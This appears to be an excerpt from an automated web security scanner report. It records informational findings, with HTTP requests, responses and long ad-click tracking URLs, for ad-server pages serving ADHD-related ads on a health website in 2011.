                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.07161686569452286&cpos=1&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p1_r1_c1">
                                       ADHD Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11105802655220032&cpos=2&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p2_r1_c2">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.04673968628048897&cpos=3&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p3_r1_c3">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=About+Depression&chash=-7096360666651597841&cscr=0.04372575879096985&cpos=4&creg=0&cnads=20&cpc=5.110000133514404&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p4_r2_c4">
                                       About Depression
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.03321396932005882&cpos=5&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p5_r2_c5">
                                       ADHD Help
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/k;227818253;0-0;0;31210306;748-470/60;37939276/37957052/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;pos=pencil;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=11065&iid=imp3fea24c3c932bcd7&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.18060718476772308&cpos=6&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=0&imps=0&cltp=1" id="cpts_p6_r2_c6">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...

18.61. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Ft%3B242224827%3B0-0%3B1%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276208478

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.07769797742366791&cpos=7&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.10167374461889267&cpos=4&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.05791044235229492&cpos=3&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.08306773006916046&cpos=6&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Medications&chash=-6864060103493088187&cscr=0.08365996181964874&cpos=5&creg=0&cnads=20&cpc=22.59000015258789&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.34689033031463623&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.16673068702220917&cpos=9&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.0632365271449089&cpos=8&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Natural+Remedies+for+ADHD&chash=4581797258583105709&cscr=0.018691612407565117&cpos=1&creg=0&cnads=20&cpc=1.5800000429153442&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Ft%3B242224827%3B0-0%3B1%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276208478 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=716199259245381
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fed4c7f34cb5610,1311276202616,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276202617,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,&1091,992,www.lifescript.com,6,2,1,imp3fea4586b9a791e0,1311276272337,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276272338,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:32 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:24:32 GMT
Content-Length: 12189

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Natural+Remedies+for+ADHD&chash=4581797258583105709&cscr=0.018691612407565117&cpos=1&creg=0&cnads=20&cpc=1.5800000429153442&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p1_r1_c1">
                                       Natural Remedies for ADHD
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.34689033031463623&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p2_r1_c2">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.05791044235229492&cpos=3&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p3_r1_c3">
                                       ADHD Help
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Disorder&chash=8475548066706871282&cscr=0.10167374461889267&cpos=4&creg=0&cnads=20&cpc=5.320000171661377&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p4_r2_c4">
                                       ADHD Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Medications&chash=-6864060103493088187&cscr=0.08365996181964874&cpos=5&creg=0&cnads=20&cpc=22.59000015258789&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p5_r2_c5">
                                       ADHD Medications
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.08306773006916046&cpos=6&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p6_r2_c6">
                                       ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p7_r3_c7">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.07769797742366791&cpos=7&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p7_r3_c7">
                                       ADD and ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p8_r3_c8">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.0632365271449089&cpos=8&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p8_r3_c8">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...
<td id="cpts_c_p9_r3_c9">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fea4586b9a791e0&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.16673068702220917&cpos=9&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p9_r3_c9">
                                       ADHD Treatment
                                       </a>
...[SNIP]...

18.62. http://d.101m3.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.101m3.com
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://d.101m3.com/afr.php?zoneid=2&cb=INSERT_RANDOM_NUMBER_HERE

The response contains the following link to another domain:

http://i.xx.openx.com/a2c/a2c69e1d758a56c7cc2fde09a37e7991e8bc1c2f/4be/4bed8490c6a24ab7c45182a3bb7d2b60.gif

Request

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 02:07:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3b07da8ac3b687db9a32c81a95750924; expires=Sun, 22-Jul-2012 02:07:44 GMT; path=/
Content-Length: 1335
Connection: close
Content-Type: text/html; charset=UTF-8

